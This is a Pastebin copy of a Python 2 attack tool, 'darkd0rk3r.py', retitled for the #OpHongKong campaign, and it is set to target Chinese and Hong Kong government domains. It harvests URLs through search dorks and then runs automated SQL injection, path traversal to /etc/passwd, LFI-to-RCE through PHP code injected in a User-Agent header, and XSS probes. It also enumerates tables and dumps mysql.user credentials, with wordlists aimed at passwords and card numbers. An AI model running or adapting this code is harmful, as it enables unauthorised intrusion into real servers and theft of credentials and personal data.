Advertisement
OpHK

dork.py - edited for #OpHongKong

Oct 12th, 2014
2,096
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.20 KB | None | 0 0
  1. ################# darkd0rk3r.py edited for #OpHongKong #############################
  2.  
  3. #!/usr/bin/python2
  4. # This was written for educational purpose and pentest only. Use it at your own risk.
  5. # Author will be not responsible for any damage!
  6.  
  7.  
  8. import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess
  9. from random import choice
  10.  
  11. # Colours
  12. W = "\033[0m";
  13. R = "\033[31m";
  14. G = "\033[32m";
  15. O = "\033[33m";
  16. B = "\033[34m";
  17.  
  18.  
  19. # Banner
  20. def logo():
  21. print R+"\n|---------------------------------------------------------------|"
  22. print "| #OpHongKong |"
  23. print "| |"
  24. print "| dork searcher |"
  25. print "| |"
  26. print "|-------------------------------------------------------------------|\n"
  27. print W
  28.  
  29. if sys.platform == 'linux' or sys.platform == 'linux2':
  30. subprocess.call("clear", shell=True)
  31. logo()
  32.  
  33. else:
  34. subprocess.call("cls", shell=True)
  35. logo()
  36.  
  37. log = "darkd0rk3r-sqli.txt"
  38. logfile = open(log, "a")
  39. lfi_log = "darkd0rk3r-lfi.txt"
  40. lfi_log_file = open(lfi_log, "a")
  41. rce_log = "darkd0rk3r-rce.txt"
  42. rce_log_file = open(rce_log, "a")
  43. xss_log = "darkd0rk3r-xss.txt"
  44. xss_log_file = open(xss_log, "a")
  45.  
  46. threads = []
  47. finallist = []
  48. vuln = []
  49. col = []
  50. darkurl = []
  51. arg_end = "--"
  52. arg_eva = "+"
  53. colMax = 10 # Change this at your will
  54. gets = 0
  55. file = "/etc/passwd"
  56. timeout = 60
  57. socket.setdefaulttimeout(timeout)
  58.  
  59.  
  60. lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]
  61.  
  62. xsses = ["<h1>XSS by baltazar</h1>","%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E"]
  63.  
  64. tables = ['user','users','tbladmins','Logins','logins','login','admins','members','member', '_wfspro_admin', '4images_users', 'a_admin', 'account', 'accounts', 'adm', 'admin', 'admin_login', 'admin_user', 'admin_userinfo', 'administer', 'administrable', 'administrate', 'administration', 'administrator', 'administrators', 'adminrights', 'admins', 'adminuser','adminusers','article_admin', 'articles', 'artikel','author', 'autore', 'backend', 'backend_users', 'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages', 'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config', 'contact', 'contacts', 'content', 'control', 'cpg_config', 'cpg132_users', 'customer', 'customers', 'customers_basket', 'dbadmins', 'dealer', 'dealers', 'diary', 'download', 'Dragon_users', 'e107.e107_user', 'e107_user', 'forum.ibf_members', 'fusion_user_groups', 'fusion_users', 'group', 'groups', 'ibf_admin_sessions', 'ibf_conf_settings', 'ibf_members', 'ibf_members_converge', 'ibf_sessions', 'icq', 'index', 'info', 'ipb.ibf_members', 'ipb_sessions', 'joomla_users', 'jos_blastchatc_users', 'jos_comprofiler_members', 'jos_contact_details', 'jos_joomblog_users', 'jos_messages_cfg', 'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici', 'kpro_adminlogs', 'kpro_user', 'links', 'login_admin', 'login_admins', 'login_user', 'login_users','logon', 'logs', 'lost_pass', 'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main', 'mambo_session', 'mambo_users', 'manage', 'manager', 'mb_users','memberlist','minibbtable_users', 'mitglieder', 'mybb_users', 'mysql', 'name', 'names', 'news', 'news_lostpass', 'newsletter', 'nuke_users', 'obb_profiles', 'order', 'orders', 'parol', 'partner', 'partners', 'passes', 'password', 'passwords', 'perdorues', 'perdoruesit', 'phorum_session', 'phorum_user', 'phorum_users', 'phpads_clients', 'phpads_config', 'phpbb_users', 'phpBB2.forum_users', 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user', 'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered', 'reguser', 'regusers', 'session', 'sessions', 'settings', 'shop.cards', 'shop.orders', 'site_login', 'site_logins', 'sitelogin', 'sitelogins', 'sites', 'smallnuke_members', 'smf_members', 'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins', 'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin', 'tb_administrator', 'tb_login', 'tb_member', 'tb_members', 'tb_user', 'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user', 'tbl_users', 'tbluser', 'tbl_clients', 'tbl_client', 'tblclients', 'tblclient', 'test', 'usebb_members','user_admin', 'user_info', 'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol', 'userinfo', 'userlist', 'userlogins', 'username', 'usernames', 'userrights','vb_user', 'vbulletin_session', 'vbulletin_user', 'voodoo_members', 'webadmin', 'webadmins', 'webmaster', 'webmasters', 'webuser', 'webusers','wp_users', 'x_admin', 'xar_roles', 'xoops_bannerclient', 'xoops_users', 'yabb_settings', 'yabbse_settings', 'Category', 'CategoryGroup', 'ChicksPass', 'dtproperties', 'JamPass', 'News', 'Passwords by usage count', 'PerfPassword', 'PerfPasswordAllSelected','pristup', 'SubCategory', 'tblRestrictedPasswords', 'Ticket System Acc Numbers', 'Total Members', 'UserPreferences', 'tblConfigs', 'tblLogBookAuthor', 'tblLogBookUser', 'tblMails', 'tblOrders', 'tblUser', 'cms_user', 'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user', 'table_user', 'email', 'mail', 'bulletin', 'login_name', 'admuserinfo', 'userlistuser_list', 'SiteLogin', 'Site_Login', 'UserAdmin']
  65.  
  66. columns = ['user', 'username', 'password', 'passwd', 'pass', 'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd', 'user_name', 'customers_email_address', 'customers_password', 'user_password', 'name', 'user_pass', 'admin_user', 'admin_password', 'admin_pass', 'usern', 'user_n', 'users', 'login', 'logins', 'login_user', 'login_admin', 'login_username', 'user_username', 'user_login', 'auid', 'apwd', 'adminid', 'admin_id', 'adminuser', 'adminuserid', 'admin_userid', 'adminusername', 'admin_username', 'adminname', 'admin_name', 'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass', 'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id', 'myusername', 'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users', 'emniplote', 'perdoruesi', 'perdorimi', 'punetoret', 'logini', 'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik', 'korisnici', 'user1', 'administrator', 'administrator_name', 'mem_login', 'login_password', 'login_pass', 'login_passwd', 'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word', 'passw', 'pass_w', 'user_passwd', 'userpass', 'userpassword', 'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword', 'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin', 'e_mail', 'usrn', 'u_name', 'uname', 'mempassword', 'mem_pass', 'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname', 'my_username', 'my_name', 'my_password', 'my_email', 'korisnicko', 'cvvnumber ', 'about', 'access', 'accnt', 'accnts', 'account', 'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail', 'admins', 'aid', 'aim', 'auth', 'authenticate', 'authentication', 'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid', 'clientname', 'clientpassword', 'clientusername', 'conf', 'config', 'contact', 'converge_pass_hash', 'converge_pass_salt', 'crack', 'customer', 'customers', 'cvvnumber', 'data', 'db_database_name', 'db_hostname', 'db_password', 'db_username', 'download', 'e-mail', 'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash', 'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member', 'images', 'index', 'ip_address', 'last_ip', 'last_login', 'lastname', 'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo', 'md5hash', 'member', 'member_id', 'member_login_key', 'member_name', 'memberid', 'membername', 'members', 'new', 'news', 'nick', 'number', 'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key', 'phone', 'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer', 'secretquestion', 'serial', 'session_member_id', 'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer', 'status', 'store', 'store1', 'store2', 'store3', 'store4', 'table_prefix', 'temp_pass', 'temp_password', 'temppass', 'temppasword', 'text', 'un', 'user_email', 'user_icq', 'user_ip', 'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd', 'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm', 'userip', 'userlogin', 'usernm', 'userpw', 'usr2', 'usrnm', 'usrs', 'warez', 'xar_name', 'xar_pass']
  67.  
  68.  
  69.  
  70. sqlerrors = {'MySQL': 'error in your SQL syntax',
  71. 'MiscError': 'mysql_fetch',
  72. 'MiscError2': 'num_rows',
  73. 'Oracle': 'ORA-01756',
  74. 'JDBC_CFM': 'Error Executing Database Query',
  75. 'JDBC_CFM2': 'SQLServer JDBC Driver',
  76. 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
  77. 'MSSQL_Uqm': 'Unclosed quotation mark',
  78. 'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
  79. 'MS-Access_JETdb': 'Microsoft JET Database',
  80. 'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
  81. 'Server Error' : 'Server Error',
  82. 'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
  83. 'Invalid Querystring' : 'Invalid Querystring',
  84. 'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
  85. 'VBScript Runtime' : 'VBScript Runtime',
  86. 'ADODB.Field' : 'ADODB.Field',
  87. 'BOF or EOF' : 'BOF or EOF',
  88. 'ADODB.Command' : 'ADODB.Command',
  89. 'JET Database' : 'JET Database',
  90. 'mysql_fetch_array()' : 'mysql_fetch_array()',
  91. 'Syntax error' : 'Syntax error',
  92. 'mysql_numrows()' : 'mysql_numrows()',
  93. 'GetArray()' : 'GetArray()',
  94. 'FetchRow()' : 'FetchRow()',
  95. 'Input string was not in a correct format' : 'Input string was not in a correct format'}
  96.  
  97.  
  98. header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
  99. 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
  100. 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
  101. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
  102. 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
  103. 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
  104. 'Microsoft Internet Explorer/4.0b1 (Windows 95)',
  105. 'Opera/8.00 (Windows NT 5.1; U; en)',
  106. 'amaya/9.51 libwww/5.4.0',
  107. 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
  108. 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
  109. 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
  110. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
  111. 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
  112. 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
  113.  
  114.  
  115. domains = {'Chinese Gov Sites':['.gov.cn','.gov.hk']}
  116.  
  117.  
  118.  
  119.  
  120. def search(inurl, maxc):
  121. urls = []
  122. for site in sitearray:
  123. page = 0
  124. try:
  125. while page < int(maxc):
  126. jar = cookielib.FileCookieJar("cookies")
  127. query = inurl+"+site:"+site
  128. results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp'
  129. request_web =urllib2.Request(results_web)
  130. agent = random.choice(header)
  131. request_web.add_header('User-Agent', agent)
  132. opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
  133. text = opener_web.open(request_web).read()
  134. stringreg = re.compile('(?<=href=")(.*?)(?=")')
  135. names = stringreg.findall(text)
  136. page += 1
  137. for name in names:
  138. if name not in urls:
  139. if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
  140. pass
  141. elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name):
  142. pass
  143. else:
  144. urls.append(name)
  145. percent = int((1.0*page/int(maxc))*100)
  146. urls_len = len(urls)
  147. sys.stdout.write("\rSite: %s | Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page)))
  148. sys.stdout.flush()
  149. except(KeyboardInterrupt):
  150. pass
  151. tmplist = []
  152. print "\n\n[+] URLS (unsorted): ",len(urls)
  153. for url in urls:
  154. try:
  155. host = url.split("/",3)
  156. domain = host[2]
  157. if domain not in tmplist and "=" in url:
  158. finallist.append(url)
  159. tmplist.append(domain)
  160.  
  161. except:
  162. pass
  163. print "[+] URLS (sorted) : ",len(finallist)
  164. return finallist
  165.  
  166.  
  167. class injThread(threading.Thread):
  168. def __init__(self,hosts):
  169. self.hosts=hosts
  170. self.fcount = 0
  171. self.check = True
  172. threading.Thread.__init__(self)
  173.  
  174. def run (self):
  175. urls = list(self.hosts)
  176. for url in urls:
  177. try:
  178. if self.check == True:
  179. ClassicINJ(url)
  180. else:
  181. break
  182. except(KeyboardInterrupt,ValueError):
  183. pass
  184. self.fcount+=1
  185.  
  186. def stop(self):
  187. self.check = False
  188.  
  189. class lfiThread(threading.Thread):
  190. def __init__(self,hosts):
  191. self.hosts=hosts
  192. self.fcount = 0
  193. self.check = True
  194. threading.Thread.__init__(self)
  195.  
  196. def run (self):
  197. urls = list(self.hosts)
  198. for url in urls:
  199. try:
  200. if self.check == True:
  201. ClassicLFI(url)
  202. else:
  203. break
  204. except(KeyboardInterrupt,ValueError):
  205. pass
  206. self.fcount+=1
  207.  
  208. def stop(self):
  209. self.check = False
  210.  
  211. class xssThread(threading.Thread):
  212. def __init__(self,hosts):
  213. self.hosts=hosts
  214. self.fcount = 0
  215. self.check = True
  216. threading.Thread.__init__(self)
  217.  
  218. def run (self):
  219. urls = list(self.hosts)
  220. for url in urls:
  221. try:
  222. if self.check == True:
  223. ClassicXSS(url)
  224. else:
  225. break
  226. except(KeyboardInterrupt,ValueError):
  227. pass
  228. self.fcount+=1
  229.  
  230. def stop(self):
  231. self.check = False
  232.  
  233.  
  234. def ClassicINJ(url):
  235. EXT = "'"
  236. host = url+EXT
  237. try:
  238. source = urllib2.urlopen(host).read()
  239. for type,eMSG in sqlerrors.items():
  240. if re.search(eMSG, source):
  241. print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found"
  242. logfile.write("\n"+host)
  243. vuln.append(host)
  244. col.append(host)
  245. break
  246.  
  247.  
  248. else:
  249. pass
  250. except:
  251. pass
  252.  
  253.  
  254. def ClassicLFI(url):
  255. lfiurl = url.rsplit('=', 1)[0]
  256. if lfiurl[-1] != "=":
  257. lfiurl = lfiurl + "="
  258. for lfi in lfis:
  259. try:
  260. check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()
  261. if re.findall("root:x", check):
  262. print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found"
  263. lfi_log_file.write("\n"+lfiurl+lfi)
  264. vuln.append(lfiurl+lfi)
  265. target = lfiurl+lfi
  266. target = target.replace("/etc/passwd","/proc/self/environ")
  267. header = "<? echo md5(baltazar); ?>"
  268. try:
  269. request_web = urllib2.Request(target)
  270. request_web.add_header('User-Agent', header)
  271. text = urllib2.urlopen(request_web)
  272. text = text.read()
  273. if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
  274. print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found"
  275. rce_log_file.write("\n",target)
  276. vuln.append(target)
  277. except:
  278. pass
  279.  
  280. except:
  281. pass
  282.  
  283. def ClassicXSS(url):
  284. for xss in xsses:
  285. try:
  286. source = urllib2.urlopen(url+xss.replace("\n","")).read()
  287. if re.findall("XSS by baltazar", source):
  288. print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)"
  289. xss_log_file.write("\n"+url+xss)
  290. vuln.append(url+xss)
  291. except:
  292. pass
  293.  
  294. def injtest():
  295. print B+"\n[+] Preparing for SQLi scanning ..."
  296. print "[+] Can take a while ..."
  297. print "[!] Working ...\n"
  298. i = len(usearch) / int(numthreads)
  299. m = len(usearch) % int(numthreads)
  300. z = 0
  301. if len(threads) <= numthreads:
  302. for x in range(0, int(numthreads)):
  303. sliced = usearch[x*i:(x+1)*i]
  304. if (z<m):
  305. sliced.append(usearch[int(numthreads)*i+z])
  306. z +=1
  307. thread = injThread(sliced)
  308. thread.start()
  309. threads.append(thread)
  310. for thread in threads:
  311. thread.join()
  312.  
  313. def lfitest():
  314. print B+"\n[+] Preparing for LFI - RCE scanning ..."
  315. print "[+] Can take a while ..."
  316. print "[!] Working ...\n"
  317. i = len(usearch) / int(numthreads)
  318. m = len(usearch) % int(numthreads)
  319. z = 0
  320. if len(threads) <= numthreads:
  321. for x in range(0, int(numthreads)):
  322. sliced = usearch[x*i:(x+1)*i]
  323. if (z<m):
  324. sliced.append(usearch[int(numthreads)*i+z])
  325. z +=1
  326. thread = lfiThread(sliced)
  327. thread.start()
  328. threads.append(thread)
  329. for thread in threads:
  330. thread.join()
  331.  
  332. def xsstest():
  333. print B+"\n[+] Preparing for XSS scanning ..."
  334. print "[+] Can take a while ..."
  335. print "[!] Working ...\n"
  336. i = len(usearch) / int(numthreads)
  337. m = len(usearch) % int(numthreads)
  338. z = 0
  339. if len(threads) <= numthreads:
  340. for x in range(0, int(numthreads)):
  341. sliced = usearch[x*i:(x+1)*i]
  342. if (z<m):
  343. sliced.append(usearch[int(numthreads)*i+z])
  344. z +=1
  345. thread = xssThread(sliced)
  346. thread.start()
  347. threads.append(thread)
  348. for thread in threads:
  349. thread.join()
  350.  
  351. menu = True
  352. new = 1
  353. while menu == True:
  354. if new == 1:
  355. threads = []
  356. finallist = []
  357. vuln = []
  358. col = []
  359. darkurl = []
  360.  
  361. stecnt = 0
  362. for k,v in domains.items():
  363. stecnt += 1
  364. print str(stecnt)+" - "+k
  365. sitekey = raw_input("\nChoose your target : ")
  366. sitearray = domains[domains.keys()[int(sitekey)-1]]
  367.  
  368.  
  369. inurl = raw_input('\nEnter your dork : ')
  370. numthreads = raw_input('Enter no. of threads : ')
  371. maxc = raw_input('Enter no. of pages : ')
  372. print "\nNumber of SQL errors :",len(sqlerrors)
  373. print "Number of LFI paths :",len(lfis)
  374. print "Number of XSS cheats :",len(xsses)
  375. print "Number of headers :",len(header)
  376. print "Number of threads :",numthreads
  377. print "Number of pages :",maxc
  378. print "Timeout in seconds :",timeout
  379. print ""
  380.  
  381. usearch = search(inurl,maxc)
  382. new = 0
  383.  
  384. print R+"\n[0] Exit"
  385. print "[1] SQLi Testing"
  386. print "[2] SQLi Testing Auto Mode"
  387. print "[3] LFI - RCE Testing"
  388. print "[4] XSS Testing"
  389. print "[5] SQLi and LFI - RCE Testing"
  390. print "[6] SQLi and XSS Testing"
  391. print "[7] LFI - RCE and XSS Testing"
  392. print "[8] SQLi,LFI - RCE and XSS Testing"
  393. print "[9] Save valid urls to file"
  394. print "[10] Print valid urls"
  395. print "[11] Found vuln in last scan"
  396. print "[12] New Scan\n"
  397.  
  398. chce = raw_input(":")
  399. if chce == '1':
  400. injtest()
  401.  
  402. if chce == '2':
  403. injtest()
  404. print B+"\n[+] Preparing for Column Finder ..."
  405. print "[+] Can take a while ..."
  406. print "[!] Working ..."
  407. # Thanks rsauron for schemafuzz
  408. for host in col:
  409. print R+"\n[+] Target: ", O+host
  410. print R+"[+] Attempting to find the number of columns ..."
  411. print "[+] Testing: ",
  412. checkfor = []
  413. host = host.rsplit("'", 1)[0]
  414. sitenew = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva
  415. makepretty = ""
  416. for x in xrange(0, colMax):
  417. try:
  418. sys.stdout.write("%s," % (x))
  419. sys.stdout.flush()
  420. darkc0de = "dark"+str(x)+"c0de"
  421. checkfor.append(darkc0de)
  422. if x > 0:
  423. sitenew += ","
  424. sitenew += "0x"+darkc0de.encode("hex")
  425. finalurl = sitenew+arg_end
  426. gets += 1
  427. source = urllib2.urlopen(finalurl).read()
  428. for y in checkfor:
  429. colFound = re.findall(y, source)
  430. if len(colFound) >= 1:
  431. print "\n[+] Column length is:", len(checkfor)
  432. nullcol = re.findall(("\d+"), y)
  433. print "[+] Found null column at column #:", nullcol[0]
  434. for z in xrange(0, len(checkfor)):
  435. if z > 0:
  436. makepretty += ","
  437. makepretty += str(z)
  438. site = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva+makepretty
  439. print "[+] SQLi URL:", site+arg_end
  440. site = site.replace(","+nullcol[0]+",",",darkc0de,")
  441. site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")
  442. site = site.replace(","+nullcol[0],",darkc0de")
  443. print "[+] darkc0de URL:", site
  444. darkurl.append(site)
  445. print "[-] Done!\n"
  446. break
  447.  
  448. except(KeyboardInterrupt, SystemExit):
  449. raise
  450. except:
  451. pass
  452.  
  453. print "\n[!] Sorry column length could not be found\n"
  454.  
  455.  
  456. #########
  457.  
  458. print B+"\n[+] Gathering MySQL Server Configuration..."
  459. for site in darkurl:
  460. head_URL = site.replace("darkc0de", "concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
  461. print R+"\n[+] Target:", O+site
  462. while 1:
  463. try:
  464. gets += 1
  465. source = urllib2.urlopen(head_URL).read()
  466. match = re.findall("\x1e\x1e\S+", source)
  467. if len(match) >= 1:
  468. match = match[0][2:].split("\x1e")
  469. version = match[0]
  470. user = match[1]
  471. database = match[2]
  472. print W+"\n\tDatabase:", database
  473. print "\tUser:", user
  474. print "\tVersion:", version
  475. version = version[0]
  476.  
  477. load = site.replace("darkc0de", "load_file(0x2f6574632f706173737764)")
  478. source = urllib2.urlopen(load).read()
  479. if re.findall("root:x", source):
  480. load = site.replace("darkc0de","concat_ws(char(58),load_file(0x"+file.encode("hex")+"),0x62616c74617a6172)")
  481. source = urllib2.urlopen(load).read()
  482. search = re.findall("baltazar",source)
  483. if len(search) > 0:
  484. print "\n[!] w00t!w00t!: "+site.replace("darkc0de", "load_file(0x"+file.encode("hex")+")")
  485.  
  486. load = site.replace("dakrc0de", "concat_ws(char(58),user,password,0x62616c74617a6172)")+arg_eva+"from"+arg_eva+"mysql.user"
  487. source = urllib2.urlopen(load).read()
  488. if re.findall("baltazar", source):
  489. print "\n[!] w00t!w00t!: "+site.replace("darkc0de", "concat_ws(char(58),user,password)")+arg_eva+"from"+arg_eva+"mysql.user"
  490.  
  491. print W+"\n[+] Number of tables:",len(tables)
  492. print "[+] Number of columns:",len(columns)
  493. print "[+] Checking for tables and columns..."
  494. target = site.replace("darkc0de", "0x62616c74617a6172")+arg_eva+"from"+arg_eva+"T"
  495. for table in tables:
  496. try:
  497. target_table = target.replace("T", table)
  498. source = urllib2.urlopen(target_table).read()
  499. search = re.findall("baltazar", source)
  500. if len(search) > 0:
  501. print "\n[!] w00t!w00t! Found a table called: < "+table+" >"
  502. print "\n[+] Lets check for columns inside table < "+table+" >"
  503. for column in columns:
  504. try:
  505. source = urllib2.urlopen(target_table.replace("0x62616c74617a6172", "concat_ws(char(58),0x62616c74617a6172,"+column+")")).read()
  506. search = re.findall("baltazar", source)
  507. if len(search) > 0:
  508. print "\t[!] w00t!w00t! Found a column called: < "+column+" >"
  509. except(KeyboardInterrupt, SystemExit):
  510. raise
  511. except(urllib2.URLErrr, socket.gaierror, socket.error, socket.timeout):
  512. pass
  513.  
  514. print "\n[-] Done searching inside table < "+table+" > for columns!"
  515.  
  516. except(KeyboardInterrupt, SystemExit):
  517. raise
  518. except(urllib2.URLError, socket.gaierror, socket.error, socket.timeout):
  519. pass
  520. print "[!] Fuzzing is finished!"
  521. break
  522. except(KeyboardInterrupt, SystemExit):
  523. raise
  524.  
  525.  
  526.  
  527.  
  528.  
  529. if chce == '3':
  530. lfitest()
  531.  
  532. if chce == '4':
  533. xsstest()
  534.  
  535. if chce == '5':
  536. injtest()
  537. lfitest()
  538.  
  539. if chce == '6':
  540. injtest()
  541. xsstest()
  542.  
  543. if chce == '7':
  544. lfitest()
  545. xsstest()
  546.  
  547. if chce == '8':
  548. injtest()
  549. lfitest()
  550. xsstest()
  551.  
  552. if chce == '9':
  553. print B+"\nSaving valid urls ("+str(len(finallist))+") to file"
  554. listname = raw_input("Filename: ")
  555. list_name = open(listname, "w")
  556. finallist.sort()
  557. for t in finallist:
  558. list_name.write(t+"\n")
  559. list_name.close()
  560. print "Urls saved, please check", listname
  561.  
  562. if chce == '10':
  563. print W+"\nPrinting valid urls:\n"
  564. finallist.sort()
  565. for t in finallist:
  566. print B+t
  567.  
  568. if chce == '11':
  569. print B+"\nVuln found ",len(vuln)
  570.  
  571. if chce == '12':
  572. new = 1
  573. print W+""
  574.  
  575. if chce == '0':
  576. print R+"\n[-] Exiting ..."
  577. mnu = False
  578. print W
  579. sys.exit(1)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement